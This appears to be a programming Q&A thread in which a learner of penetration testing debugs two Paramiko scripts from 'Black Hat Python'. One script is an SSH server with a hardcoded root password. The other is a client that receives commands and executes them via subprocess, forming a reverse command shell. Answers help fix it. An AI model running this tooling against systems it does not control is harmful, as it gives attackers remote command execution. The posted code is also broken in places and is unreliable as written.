# Python Scripts Run but don't do anything

Tags: python, ssh

Lately, I've developed an interest in penetration testing. I decided to try and learn how to write some scripts before investing in a full blown course. Currently I'm working my way through the book Black Hat Python book by Justin Seitz.

I'm in the section on SSH using Paramiko and two of the scripts have me stumped. They both run without errors but nothing gets shown on screen. In Windows and Linux the terminal (or DOS prompt) just returns immediately to the prompt. I have gone over the scripts several times and can't find the issue. The code for both scripts is shown in full below.

**Script #1** `bh_sshserver.py` (The purpose of this script is to create an ssh server)

```
import socket
import paramiko
import threading
import sys



class Server (paramiko.ServerInterface):
   def _init_(self):
      self.event = threading.Event()
      def check_channel_request(self, kind, chanid):
         if kind == 'session':
            return
         paramiko.OPEN_SUCCEEDED
         return
      paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

      def check_auth_password(self, username, password):
         if (username == 'root') and (password == '12345'):
            return paramiko.AUTH_SUCCESSFUL
         return paramiko.AUTH_FAILED
      server = sys.argv[1]
      ssh_port = sys.argv[2]
      try:
         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
         sock.bind((server, ssh_port))
         sock.listen(100)
         print '[+] Listening for connection...'
         client, addr = sock.accept()
      except Exception, e:
         print ' [-] Listen Failed: ' + str(e)
         sys.exit(1)
         print '[+] Got a connection'

         try:
            bhSession = paramiko.Transport(client)
            bhSession.add_server_key(host_key)
            server = Server()
            try:
               bhSession.start_server(server=server)
            except paramiko.SSHException, x:
               print '[-] SSH Negotiation Failed'

               chan = bhSession.accept(20)
               print '[+] Authenticated!'
               print chan.recv(1024)
               chan.send ('Welcome to bh_ssh')
               while True:
                  try:
                     command= raw_input("Enter command: ").strip('\n')
                     if command != 'exit':
                        chan.send(command)
                        print chan.recv(1024) + '\n'
                     else:
                        chan.send('exit')
                        print 'exiting'
                        bhSession.close()
                        raise Exception ('exit')
                  except KeyboardInterrupt:
                     bhSession.close()
         except Exception, e:
            print '[-] Caught exception: ' + str(e)
            try:
               bhSession.close()
            except:
               pass
            sys.exit(1)
```

**Script #2** `bh_sshRcmd.py` (The purpose of this script is to create a command receiver for the ssh server to connect to)

```
import threading 
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):
    client = paramiko.SSHClient()

    #client.load host keys ('/home/root/.ssh/known_hosts')

    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        ssh_session.exec_command(command)
        print ssh_session.recv(1024)

        # Read the banner

        while True:
            command = ssh_session.recv(1024)
            # Get Command from SSH Server
            try:
                cmd_output = subprocess.check_output(command, shell=True)
                ssh_session.send(cmd_output)
            except Exception, e:
                ssh_session.send(str(e))
                client.close()
            return
        ssh_command('192.168.1.26', 'Admin', '12345', 'ClientConnected')
```

Both of these scripts were written in Windows and so do not need the shebang statement (ie #`!/usr/bin/python`) at the top. I copied them over to a Linux VM and added that statement, plus made them executable using `chmod +x`. Still, nothing shows on screen when the scripts run. The IP addresses are from a VMware virtual network which has never given me problems before.

Comment: Should the last line of `bh_sshRcmd.py` be indented? This may be why nothing is running.

Comment: I've edited your question to make it readable. Please check the Python code, especially if the indention is correct.

Comment: @amccormack I've fixed that though I am not sure about the whole code. The class `Server` is never used, for example.

Comment: Yeah, I assume that is supposed to be running server side but he never started it.

Comment: Also, why, in the last line of `bh_sshRcmd.py` is the last parameter of `ssh_command`  *ClientConnected*. That doesn't appear to be a valid command. Try `whoami`, it runs in every OS I come across, so it is a pretty good test when you want to see if code execution works.

Comment: Disregard that last comment, just realized how this code worked. It connects to a server, grabs a command and executes it locally and sends the response. I'll leave the comment alive in case someone else has the same question.

Comment: @LutzHorn: Indentation is syntax; please don't change syntax in a question when syntactical errors are likely to be important to the question.

Comment: @user2357112 That's why I've asked the OP to check the question. The usual edit I do on questions like this is to select *all* code that belong together and toggle it as code. If the original code had broken indention this will neither fix nore break it.

Answer (score 0):

It is likely that there is an error connecting to your server. Try adding more print statements to cover the conditionals like so:

```
import threading 
import paramiko
import subprocess

def ssh_command(ip, user, passwd, command):
    print 'running ssh_command with ip: {ip} user: {user} passwd: {passwd}, command: {command}'.format(ip=ip,user=user,passwd=passwd,command=command)
    client = paramiko.SSHClient()

    #client.load host keys ('/home/root/.ssh/known_hosts')

    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    client.connect(ip, username=user, password=passwd)
    ssh_session = client.get_transport().open_session()
    if ssh_session.active:
        print 'ssh_session is active'
        ssh_session.exec_command(command)
        print ssh_session.recv(1024)

        # Read the banner

        while True:
            print 'recv-ing'
            command = ssh_session.recv(1024)
            # Get Command from SSH Server
            try:
                cmd_output = subprocess.check_output(command, shell=True)
                ssh_session.send(cmd_output)
            except Exception, e:
                ssh_session.send(str(e))
                client.close()
            return
    else:
        print 'ssh_session is not active'

ssh_command('192.168.1.26', 'Admin', '12345', 'ClientConnected')
```

As for `bh_sshserver.py`, if you ran `python bh_sshserver.py`, nothing would happen. This is because you don't have any statements in the main scope.  If you wanted to start the server you could add code to the bottom of the script with no indentation.

Answer (score 0):

- You should call your server from the terminal using command-line arguments like this:
  python scriptname.py server_adress port
- Change indentation on the last line of client script - it should call your function
- Server adresses in the terminal and in the client function should be the same

That's pretty much all

I can provide you with these two scripts that are working for me, if you need it.

Answer (score 0):

Thanks to everyone who replied. In the end I found some Paramiko demo files from github that included a sample SSH server. It turns out the script is much more complicated than the author makes it out to be. I was missing a ton of code, which is why the server was not working. As soon as I made my script a rough match to the sample it worked perfectly so did my client.

In case anyone comes across a similar problem, here is the link to the Paramiko demo files:

https://github.com/paramiko/paramiko/tree/master/demos